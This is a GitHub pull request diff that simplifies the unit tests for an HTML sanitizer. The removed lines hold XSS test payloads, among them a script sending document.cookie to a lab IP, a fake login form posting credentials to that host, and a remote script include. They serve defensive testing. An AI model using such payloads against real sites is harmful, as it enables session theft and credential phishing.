Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Basic sanity tests for sanitizeHTML #6247

Merged
merged 2 commits into from
Mar 30, 2020
Merged

Basic sanity tests for sanitizeHTML #6247

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
3e2689a
Basic sanity tests for sanitizeHTML
johnwcallahan Mar 25, 2020
f2b93a8
Adjust test
johnwcallahan Mar 25, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
59 changes: 10 additions & 49 deletions packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,56 +1,17 @@
import { isURLValid, sanitizeHTML } from './sanitizeHTML';

/** not allowed */
const script = '<script src=""></script>';
const script2 = `<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>`;
const xhrScript = `<script>
var xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');
</script>`;
const aClick = '<a onClick="() => console.log("hello world")"></a>';
const aClickLang =
'<a lang="en-us" onClick="() => console.log("hello world")"></a>';
const login = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br></form></h3>`;
const aScript = `<a href="javascript:alert(8007)">Click me</a>`;
const queryString = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script src="http://192.168.149.128/xss.js">`;

/** allowed */
const a = '<a href="helloworld.com">Hello world</a>';
const aLang = '<a lang="en-us"></a>';

it('should escape script tags, retain child text, and strip attributes', () => {
expect(sanitizeHTML(script)).toBe('&lt;script&gt;&lt;/script&gt;');
expect(sanitizeHTML(script2)).toBe(
'&lt;script&gt;new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;&lt;/script&gt;'
);
expect(sanitizeHTML(xhrScript)).toBe(
`&lt;script&gt;
var xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('txtName=xss&amp;mtxMessage=xss&amp;btnSign=Sign+Guestbook');
&lt;/script&gt;`
);
});

it('should escape unwanted blacklisted tags', () => {
expect(sanitizeHTML(login)).not.toMatch(/<form|<input/);
expect(sanitizeHTML(aScript)).toBe(`<span>Click me</span>`);
});
describe('sanitizeHTML', () => {
it('should escape non-whitelisted tags', () => {
expect(sanitizeHTML('<script>')).not.toContain('<script>');
});

it('should not allow query string attacks', () => {
expect(sanitizeHTML(queryString)).toBe(
'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=&lt;script&gt;&lt;/script&gt;'
);
});
it('should strip non-whitelisted attributes', () => {
expect(sanitizeHTML('<a onmouseover>')).not.toContain('onmouseover');
});

it('should only allow whitelisted HTML attributes', () => {
expect(sanitizeHTML(aClick)).toBe('<a></a>');
expect(sanitizeHTML(aLang)).toBe(aLang);
expect(sanitizeHTML(aClickLang)).toBe(aLang);
expect(sanitizeHTML(a)).toBe(a);
it('should strip invalid href values', () => {
expect(sanitizeHTML('<a href="javascript:void"/>')).not.toContain('href');
});
});

describe('isURLValid', () => {
Expand Down